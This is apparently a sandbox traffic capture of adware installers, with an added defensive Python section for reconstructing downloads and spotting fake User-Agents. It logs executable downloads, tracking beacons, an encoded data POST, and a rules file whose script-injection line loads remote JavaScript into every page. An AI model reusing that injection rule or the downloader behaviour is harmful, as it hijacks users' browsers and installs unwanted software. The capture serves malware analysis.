VTag: 43879645100000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 561
Cache-Control: max-age=900
Date: Thu, 30 Apr 2015 23:11:16 GMT
Connection: keep-alive
[DER CRL, 561 bytes, binary omitted; recoverable strings: issuer DN values US / Washington / Redmond / Microsoft Corporation / Microsoft Windows Verification PCA, thisUpdate 150306223202Z, nextUpdate 150605105201Z]
GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com
HTTP/1.1 200 OK
Content-Type: application/pkix-crl
Last-Modified: Thu, 05 Mar 2015 06:01:35 GMT
Accept-Ranges: bytes
ETag: "cf2633d6957d01:0"
Server: Microsoft-IIS/8.0
VTag: 43853244400000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 550
Cache-Control: max-age=900
Date: Thu, 30 Apr 2015 23:11:16 GMT
Connection: keep-alive
[DER CRL, 550 bytes, binary omitted; recoverable strings: issuer DN values US / Washington / Redmond / Microsoft Corporation / Microsoft Time-Stamp PCA, thisUpdate 150304221607Z, nextUpdate 150603103607Z]
GET /?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg HTTP/1.1
Host: VVV.google.com.ua
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 302 Found
Location: hXXps://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg&gws_rd=ssl
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=51f9c94f4cfe29d4:FF=0:TM=1430435240:LM=1430435240:S=g94WORl29EpjfH1w; expires=Sat, 29-Apr-2017 23:07:20 GMT; path=/; domain=.google.com.ua
Set-Cookie: NID=67=qdoOTsxHIBtzTljMGdrpSFmRCtEgqqpaqGd7TQCsWjdJn2cW0q0YIqjLKJ0KLzJVLGIWtQmLiygzoNGFC7PcavEgBZ0BXopqy-HiWAZ0-35cuvO-QET6X7KCnu_zeje-; expires=Fri, 30-Oct-2015 23:07:20 GMT; path=/; domain=.google.com.ua; HttpOnly
P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Date: Thu, 30 Apr 2015 23:07:20 GMT
Server: gws
Content-Length: 275
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic,p=1
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="hXXps://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg&gws_rd=ssl">here</A>.
</BODY></HTML>
HEAD /ofr/isicicc2.7.cis HTTP/1.1
Accept: */*
Host: cdneu.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: application/x-unknown-content-type
Content-Length: 385602
Connection: keep-alive
x-amz-id-2: mDcW82ox1HV Qa5CQlP7ax9z1LW NDusKLRqtoehnaXwvwv0/IvYJi gOiCMPvPQhpv51Gzogaw=
x-amz-request-id: 2863C8C2B1E22044
x-amz-version-id: YbU94Nse0oZofhTi2ZOIzFEKvuh9AniM
x-amz-meta-s3fox-modifiedtime: 1424088160999
x-amz-meta-s3fox-filesize: 385602
Last-Modified: Mon, 16 Feb 2015 12:09:44 GMT
ETag: "83fc375cf199ed35bd27a27f506b831f"
Accept-Ranges: bytes
HTTP/1.1 206 Partial Content
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:10 GMT
Content-Type: application/x-unknown-content-type
Content-Length: 180802
Connection: keep-alive
x-amz-id-2: mDcW82ox1HV Qa5CQlP7ax9z1LW NDusKLRqtoehnaXwvwv0/IvYJi gOiCMPvPQhpv51Gzogaw=
x-amz-request-id: 2863C8C2B1E22044
x-amz-version-id: YbU94Nse0oZofhTi2ZOIzFEKvuh9AniM
x-amz-meta-s3fox-modifiedtime: 1424088160999
x-amz-meta-s3fox-filesize: 385602
Last-Modified: Mon, 16 Feb 2015 12:09:44 GMT
ETag: "83fc375cf199ed35bd27a27f506b831f"
Content-Range: bytes 204800-385601/385602
[binary body of byte range 204800-385601 omitted]
<<< skipped >>>
GET /ofr/isicicc2.7.cis HTTP/1.1
Range: bytes=102400-204799
Accept: */*
Host: cdneu.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
[binary body of the requested byte range omitted; the response headers for this GET are not shown in the report]
<<< skipped >>>
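The cdneu.beyabir.com exchange above is a segmented download: a HEAD to learn the object size (385602 bytes), then GETs with Range headers for 100 KiB slices, answered with 206 Partial Content and a Content-Range confirming the slice. It is also sent with a User-Agent that claims Windows NT 5.1 (Windows XP), while every other browser-style User-Agent on this page claims Windows NT 6.1, which points to a hard-coded string in the downloader component rather than a real browser. The code below is an added example written for this page, not part of the report or of any tool it names. It uses only the Python standard library and works on request/response summaries constructed from the captured headers; the first slice's request is not on the page and the second GET's response headers are not shown, so both are recorded as unknown.

```python
import re

# Summaries of the cdneu.beyabir.com exchange, constructed from the headers on
# this page. content_range is (first, last, total) from a 206; range is the
# client's Range header when no response headers were captured for it.
CDN_EXCHANGE = [
    {"method": "HEAD", "path": "/ofr/isicicc2.7.cis", "status": 200,
     "content_length": 385602, "content_range": None, "range": None},
    {"method": "GET", "path": "/ofr/isicicc2.7.cis", "status": None,
     "content_length": None, "content_range": None, "range": (102400, 204799)},
    {"method": "GET", "path": "/ofr/isicicc2.7.cis", "status": 206,
     "content_length": 180802, "content_range": (204800, 385601, 385602), "range": None},
]

# Every User-Agent string that appears on this page, copied from the capture.
USER_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; "
    ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0",
    "Microsoft-CryptoAPI/6.1",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
]


def reconstruct_download(records):
    """Stitch HEAD + Range/206 records for one object into the total size, the
    byte segments observed, and the gaps the capture does not cover."""
    total, segments = None, []
    for r in records:
        if r["method"] == "HEAD" and r["status"] == 200:
            total = r["content_length"]
        elif r.get("content_range"):               # server-confirmed 206 slice
            first, last, size = r["content_range"]
            segments.append((first, last))
            if total is None:
                total = size
        elif r.get("range"):                       # client request only, no response seen
            segments.append(r["range"])
    segments.sort()
    gaps, cursor = [], 0
    for first, last in segments:
        if first > cursor:
            gaps.append((cursor, first - 1))
        cursor = max(cursor, last + 1)
    if total is not None and cursor < total:
        gaps.append((cursor, total - 1))
    chunk = (segments[0][1] - segments[0][0] + 1) if segments else None
    return {"total": total, "segments": segments, "gaps": gaps, "chunk_size": chunk}


_NT_VERSION = re.compile(r"Windows NT (\d+\.\d+)")


def os_claim_outliers(user_agents):
    """Return UA strings whose claimed 'Windows NT x.y' disagrees with the version
    the majority of the host's other UAs claim (a sign of a hard-coded fake UA)."""
    claims = {}
    for ua in user_agents:
        m = _NT_VERSION.search(ua)
        if m:
            claims[ua] = m.group(1)
    if not claims:
        return []
    versions = list(claims.values())
    majority = max(set(versions), key=versions.count)
    return sorted(ua for ua, v in claims.items() if v != majority)


if __name__ == "__main__":
    print(reconstruct_download(CDN_EXCHANGE))
    print(os_claim_outliers(USER_AGENTS))
```

The gap list is what tells you how much of the 385602-byte object the capture actually contains (here the first 102400 bytes are missing), which matters before trying to carve the .cis file out of the pcap; the UA check is the kind of per-host consistency rule that is cheap to run over proxy logs and that a downloader with a fixed User-Agent string cannot satisfy.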
GET /3517/2 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ejpkwz.cc
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 01 May 2015 01:05:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.14p1
Location: hXXp://VVV.ejpkwz.cc/files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip
GET /files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ejpkwz.cc
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 May 2015 01:05:38 GMT
Content-Type: application/zip
Content-Length: 3016484
Last-Modified: Tue, 28 Apr 2015 10:21:26 GMT
Connection: keep-alive
Accept-Ranges: bytes
[ZIP archive body, 3016484 bytes, omitted; entry names visible in the local file headers: 479.db, ClearnC.exe]
<<< skipped >>>
GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQCRRRvT8MWO4g== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:56 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=120183, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:20:25 GMT
Expires: Sat, 02 May 2015 10:20:25 GMT
ETag: "d08b003f15d07cc5bfc23c2479efc8bedd8da485"
Content-Length: 1788
Connection: close
Content-Type: application/ocsp-response
GET /services/stores?dummy=593 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Content-Encoding: gzip
GET /services/rules?dummy=865 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:22 GMT
Content-Type: text/plain
Content-Length: 265
Connection: keep-alive
Last-Modified: Fri, 06 Feb 2015 21:11:55 GMT
ETag: "5d60ef-109-50e71dec37cc0"
Cache-Control: max-age=600
Expires: Thu, 30 Apr 2015 23:17:22 GMT
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
</body>|<script>var cb_instID='{instID}';cbS=document.createElement("script");cbS.setAttribute("type","text/javascript");cbS.setAttribute("src", "hXXp://related.deals/services/load.js");document.body.appendChild(cbS);</script></body>.{cashReminder_instID}|{instID}
GET /services/update/1.0.0/Oe7hZG4iL2THGzzgTyPL5m0uORXCQUea/677 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:22 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ds HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:20 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48
{"stats":"ok","time":"0.62 ms","message":"store 1 action and 0 update "}
0
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.finish HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:25 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
4a
{"stats":"ok","time":"262.11 ms","message":"store 1 action and 0 update "}
0
POST /YBRInternet/?v=5.0&c=1840466908 HTTP/1.1
Accept: */*
Host: os.beyabir.com
User-Agent: ICAS
Content-Length: 1404
Cache-Control: no-cache
0A0Czu0Y0B0RtN0U0I0DzutDtDyDtDyDyCtBtCtDtCyByEtCtCyD0FtN0W0VzuyCtFtCtN0W0S0PzutCtN0O0S0L1T1G1Nzu1P1GtN0E2V1P0C1M1J0S2Y1HzutAyDyEtCtDzytCyCyCtBtN1L1B0A1Q1H1L1GzutCtN0T0KzutAzzyEtAtAzytN0U0I0DzutDtDyDtDyDyCtBtCtDtCyByEtCtCyD0FtN0U0I0D0N1P2WzutDtDyDtDyDyCtBtCtDtCyByEtCtCyD0FtN0M0G0U0I0Dzu1RtDtAtBtB1T1R1QtGyD1PyD1QtGyEtB1OtDtG1StCyCtAtG1RyDzytC1P1PyC1O1OyD1SzytN0M0S0I0DzutBzzyDzztDtBtDzytAyDtGtBtCyDyCzyzytByDyDtDtGtAyCyDzztCtAtCzztDyEtN0S0I0D0U0I0Dzu0A0AyDzy0FtDyEyBzztDzytCtCzztByC0D0AtD0A0AzyyD0C0ByEzz0AtCtCyD0FtN0M0A0C1V0LzutDtDyDtDyDyCtBtCtDtCyByEtOtA0AtCzytBtFtCyCzztFtCtAzytFtCtAyDtOtA0AyCtOtA0AtCtN0S0D0TzutBtDtCyDtDyDtDtCtDtBtDyBtDzytDtBzztN0V0M0Czu0V0M0WtN1L1B0V0M0D1P1OzutCtN0P0E1V0M0O0D0Ezu0D0L0LtN1I1L2ZzutAyDyCyBzzzytN1L1Q1B1RzutByBtN0D0E0P1V0M0O0DzutBtN1L1B0A1Q1H1L1GzutCtN1L1B0U1T1R0O1GzutDtN1L1B0U1B1P1C0A1Q1H1L1GzutCtN0R0N1T1H1Pzu0CtOtA0AtOyD0C0U1B1P1C1BtOyD0C1T1Q1HtOyD0C0A1E1E0D1T2Z1TtOyD0C0L1F1R1T1ItOyD0C0T1P1H1EtOyD0C0T1P1H1EtOyD0C0O1NtA0C2X0TyBzz2X0S0M1TtD0NtD0L0P1T1LyB0Q2X2Z1NtA0C2X0TyBzz2X0S0M1TtD0NtD0L0P1T1LyB0Q2X2ZtOyD0CtAtCtDyBtCyE1V1L1BtF1P2V1PtN0O0S0L1T1G1Nzu1P1GtN0O0S0V1P1CzuyCtFtCtN0O0S0S0P0V1P1CzutCtN0O0S2VyCyEzutCtN0P0P0Nzu1TtCtDyC1RtAzz1PzyyCtCtBtByB1O1PyEtDtC1O1P1QtA1PtAyDyBtBzzyD1S1RtF1P2V1PtN0M1P1H0P1M0AzutCtAtByBtN0M1P1H0P1M0TzutBtDyEyBtN0M1P1H0V1L1C0AzutCzyyCyEtN0M1P1H0V1L1C0TzutBtDyEyBtN0P0R0O0D0U0C0T1V0T0I0T0L0Ezu1Q1P1B1E1C1F2Z1P2Z1F1C
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Date: Thu, 30 Apr 2015 23:07:07 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: nginx
X-ICSCT-CC: UA
X-ICSCT-CITY: Kharkiv
X-ICSCT-GICSET: global1373
X-ICSCT-IP: 193.138.244.231
X-ICSCT-SERVER-NAME: ads.slave-128-eu-west-1b-c298b624
X-ICSCT-TIMESTAMP: 20150430180707062
X-ICSCT-VERSION: 1.2.8
X-ICSCT-XC: 1f3cfb072bc5ded412eb0f20eaa0b3fa349c056a
X-Robots-Tag: none
transfer-encoding: chunked
Connection: keep-alive
GET /windowspm/up?ptid=pcm&sid=WindowsMangerProtect&ln=en_us&ver=20.0.0.2227&uid=&upv= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.theviilage.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 30 Apr 2015 23:08:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14p1
Content-Encoding: gzip
POST /?pcrc=497235937&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 688
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:08 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTEemCaVgs8Tuh2B9fGVE0pKKNyzgQUTF+nNhcF4oZhIkk5jLmo40rgOBoCEC6utoKGY/7ZdVX4/iTzOxo= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1552
content-transfer-encoding: binary
Cache-Control: max-age=521950, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 00:10:33 GMT
Expires: Thu, 7 May 2015 00:10:33 GMT
Date: Thu, 30 Apr 2015 23:12:34 GMT
Connection: keep-alive
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRODEXefhs/UZFum2o8YfzOFwceMwQUkz5j3yJ0BOBkhDHd2yOfDq+2TZMCEA89qsgV9niZmSI6gIO0S/U= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1725
content-transfer-encoding: binary
Cache-Control: max-age=565181, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 12:10:12 GMT
Expires: Thu, 7 May 2015 12:10:12 GMT
Date: Thu, 30 Apr 2015 23:12:34 GMT
Connection: keep-alive
GET /SL2 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/150814s/150814c.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: pcmega.go2cloud.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 30 Apr 2015 23:07:09 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: nginx/1.7.9
Content-Length: 43
Connection: keep-alive
GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQDstfTWy5byVg== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:54 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=120452, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:25:06 GMT
Expires: Sat, 02 May 2015 10:25:06 GMT
ETag: "e6664fd0595206b2ff0e579607b274885636c2c5"
Content-Length: 1788
Connection: close
Content-Type: application/ocsp-response
GET /s9.g?login=pcofferp&jv=y&j=y&srw=1716&srb=32&l=http://VVV.4threquest.me/registro/310113f8.htm HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: e0.extreme-dm.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.7.10
Date: Thu, 30 Apr 2015 23:07:06 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
Cache-Control: private,no-cache,no-store
Pragma: no-cache
Expires: Mon, 28 Sep 1970 06:00:00 GMT
GET /services/rules.txt?dummy=908 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.gosaferllc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:22 GMT
Content-Type: text/plain
Connection: keep-alive
Last-Modified: Sun, 28 Dec 2014 17:27:37 GMT
ETag: "5a246f5-10-50b4a12f3b440"
Accept-Ranges: bytes
Content-Length: 16
Cache-Control: max-age=600
Expires: Thu, 30 Apr 2015 23:17:22 GMT
P3P: CP="Potato"
X-Cache: BYPASS
</body>|</body>
GET /services/update.php?v=1.0.0&key=OuKz1Yi6BxlXdCQ8IZpYGGBgz2TyMvRv&dummy=408 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.gosaferllc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:23 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.5.15
P3P: CP="Potato"
Content-Length: 0
X-Cache: BYPASS
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.hp HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:18 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48
{"stats":"ok","time":"0.85 ms","message":"store 1 action and 0 update "}
0
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.nt.ff.tab HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:25 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
4a
{"stats":"ok","time":"289.61 ms","message":"store 1 action and 0 update "}
0
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECEGVSJuGyLhjhWQ8phawi51w= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1453
content-transfer-encoding: binary
Cache-Control: max-age=552950, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 08:45:10 GMT
Expires: Thu, 7 May 2015 08:45:10 GMT
Date: Thu, 30 Apr 2015 23:12:10 GMT
Connection: keep-alive
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAxNF3PJUX7iAOhAP2oGxcI= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1790
content-transfer-encoding: binary
Cache-Control: max-age=361763, public, no-transform, must-revalidate
Last-Modified: Tue, 28 Apr 2015 03:40:02 GMT
Expires: Tue, 5 May 2015 03:40:02 GMT
Date: Thu, 30 Apr 2015 23:12:11 GMT
Connection: keep-alive
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ChromeSync HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:39 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48
{"stats":"ok","time":"1.20 ms","message":"store 1 action and 0 update "}
0
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.regok HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:21 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48
{"stats":"ok","time":"0.63 ms","message":"store 1 action and 0 update "}
0
GET //MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH+3ahq1OMCAxvnFQ== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:52 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=120329, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:22:55 GMT
Expires: Sat, 02 May 2015 10:22:55 GMT
ETag: "c6961d1bde2c92575adba40476a0f961c1ef5e15"
Content-Length: 1708
Connection: close
Content-Type: application/ocsp-response
GET /310714d/310714_cr.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: application/octet-stream
Content-Length: 1085040
Last-Modified: Thu, 30 Apr 2015 23:07:02 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
